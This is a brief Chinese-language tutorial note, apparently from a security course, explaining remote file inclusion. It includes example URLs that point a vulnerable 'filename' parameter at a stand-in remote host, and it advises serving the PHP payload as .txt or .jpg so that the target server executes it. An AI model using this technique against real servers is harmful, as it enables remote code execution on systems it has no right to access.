某学员在之前提过一个问题,文件包含漏洞是否可以加载php文件,后来我在语雀上对该问题做出解答
在使用文件包含漏洞包含远程文件的时候如:
http://localhost/index.php/?filename=http://xxx.com/phpinfo.php
phpinfo打印出的信息是否为本地信息?
答案:否
我们远程文件包含过来的内容是以php解析呈现出来的,如果直接拉取已执行的php那会直接将结果获取过来,所以哦我们是以其他格式文件形式拉取过来,如:
http://localhost/index.php/?filename=http://xxx.com/phpinfo.txt
http://localhost/index.php/?filename=http://xxx.com/phpinfo.jpg
等格式使其内容被解析为php。换成jsp类型网站同理